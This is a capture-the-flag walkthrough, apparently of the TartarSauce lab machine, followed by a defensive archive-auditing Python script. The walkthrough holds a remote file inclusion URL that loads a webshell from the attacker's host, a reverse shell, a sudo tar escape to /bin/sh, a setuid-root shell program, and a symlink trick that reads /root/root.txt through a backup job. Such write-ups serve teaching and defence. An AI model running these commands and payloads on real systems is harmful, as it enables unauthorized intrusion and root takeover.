- wpscan scanning for vulnerable plugins
- Linux command privilege escalation (https://gtfobins.github.io/)
- ln -s
- stty for a stable interactive shell
- diff follows a symbolic link to the location it points at
The port scan shows only port 80 open, and a quick directory scan turns up only a robots.txt.

Nothing listed inside it is useful when opened.
The directory scan also found a WordPress path.

Run wpscan against it directly:

```bash
wpscan --url http://10.10.10.88/webservices/wp --enumerate p,u --plugins-detection aggressive
```

The scan result shows one plugin with a known vulnerability.

Look up whether this plugin has other vulnerabilities.

Check the payload in the corresponding file and rename the webshell to the required name, wp-load.php:

```
http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/
```

The nc listener on kali receives a shell connection.

Check with sudo -l.

This shows that we can run the tar command as the user onuma. The command used is taken from the site below:
Linux command execution shell collection
The command used:

```bash
sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```

Next, a service named backuperer turns out to have run recently, and it runs every 5 minutes.

Locate backuperer.


Check the file type and contents:

```bash
cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ???g???
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
```
The script logic is roughly this: it archives the target directory /var/www/html into /var/tmp under a filename beginning with a dot, waits 30 s, then extracts that archive (as root) into /var/tmp/check and compares the result against /var/www/html. Because the archive sits in world-writable /var/tmp during the 30 s wait, it can be swapped before extraction, and the extraction preserves any setuid bits it contains.

First compile an executable locally and set the suid bit on it. The code is as follows:

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Setuid-root wrapper: when the binary carries the suid bit and is
 * extracted by root, running it drops into a root shell. */
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0;
}
```
Then pack it into an archive using the target's path layout /var/www/html and upload it to /var/tmp on the target.

Next, set up a proper tty:

```bash
$ python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
root@kali:~/Desktop# stty raw -echo
fg
Enter
Enter
```

The above is optional; what follows is required:

```bash
onuma@TartarSauce:/$ stty rows 34 columns 194
stty rows 23 columns 79
onuma@TartarSauce:/$ export TERM=xterm-color
export TERM=xterm-color
```
Then run `systemctl list-timers`, and once the countdown expires, replace the target file with our tar archive.

If that is tedious, you can run `watch -n 1 'systemctl list-timers'` instead (this way you need not worry about Ctrl+C dropping the connection, while still being able to stop the command), but the "optional" tty setup described above must have been done first.

After a short wait a check directory appears.

Open the directory inside it to find the previously compiled executable; running it switches successfully to root.

Second method (not privilege escalation, just reading the flag)

diff follows a symbolic link and reads the location it points at.

Create a file 1.txt under /var/www/html, then pack the /var/www/html directory into /var/tmp and replace the 1.txt inside it with a symbolic link. After the backup program runs, swap in the file; 30 s later, check /var/backups/onuma_backup_error.txt and the flag is there.

```bash
ln -s /root/root.txt var/www/html/1.txt
```
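Both techniques in this writeup, the setuid binary that survives root's extraction and the symlink that `diff -r` follows, work because the backup job unpacks an archive from world-writable /var/tmp as root without inspecting it. The following Python script is an added example of the check a hardened backup job should run before extracting; it is not part of the original writeup or of the box. It audits every member of a tar archive and flags setuid/setgid modes, link entries, and paths that escape the extraction directory. The sample archive is constructed in memory here, and the function and finding names are my own.

```python
import io
import stat
import tarfile
from typing import List, Tuple

# (member name, reason it is unsafe to extract as a privileged user)
Finding = Tuple[str, str]


def audit_archive(data: bytes) -> List[Finding]:
    """Inspect each member of a tar archive (as bytes) and return every
    reason a root-run backup job should refuse to extract it."""
    findings: List[Finding] = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf.getmembers():
            name = m.name
            # Absolute paths or '..' components would write outside -C <dir>.
            if name.startswith("/") or ".." in name.split("/"):
                findings.append((name, "path escapes the extraction directory"))
            # Symlinks and hardlinks: diff -r and later tar runs follow them,
            # which is exactly how the flag read above works.
            if m.issym() or m.islnk():
                findings.append((name, "link entry (diff/tar would follow it)"))
            # Root's tar preserves setuid/setgid bits by default (-p is implied).
            if m.mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((name, "setuid/setgid bit set"))
    return findings


def safe_to_extract(data: bytes) -> bool:
    """True only when the audit produced no findings."""
    return not audit_archive(data)


def build_sample_archive() -> bytes:
    """Construct an in-memory archive (constructed test data, not a real
    backup) that reproduces the shapes this audit must catch."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        # A benign web file, the only member that should pass.
        body = b"<html></html>"
        info = tarfile.TarInfo("var/www/html/index.html")
        info.size = len(body)
        info.mode = 0o644
        tf.addfile(info, io.BytesIO(body))

        # A setuid binary planted in the web root (placeholder bytes).
        body = b"\x7fELF-placeholder"
        info = tarfile.TarInfo("var/www/html/shell")
        info.size = len(body)
        info.mode = 0o4755
        tf.addfile(info, io.BytesIO(body))

        # A symlink pointing at a root-only file.
        info = tarfile.TarInfo("var/www/html/1.txt")
        info.type = tarfile.SYMTYPE
        info.linkname = "/root/root.txt"
        tf.addfile(info)

        # A path-traversal member.
        body = b"x"
        info = tarfile.TarInfo("var/www/../../root/evil.txt")
        info.size = len(body)
        info.mode = 0o644
        tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in audit_archive(build_sample_archive()):
        print(f"REJECT {name}: {reason}")
```

The audit is a gate, not the whole fix: the job should also create its temporary archive and staging directory under a root-only location (for example with `mktemp -d` inside a directory unwritable by other users) rather than /var/tmp, and extract with GNU tar's `--no-same-owner --no-same-permissions` so that ownership and mode bits in the archive are never trusted even if a bad member slips through.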
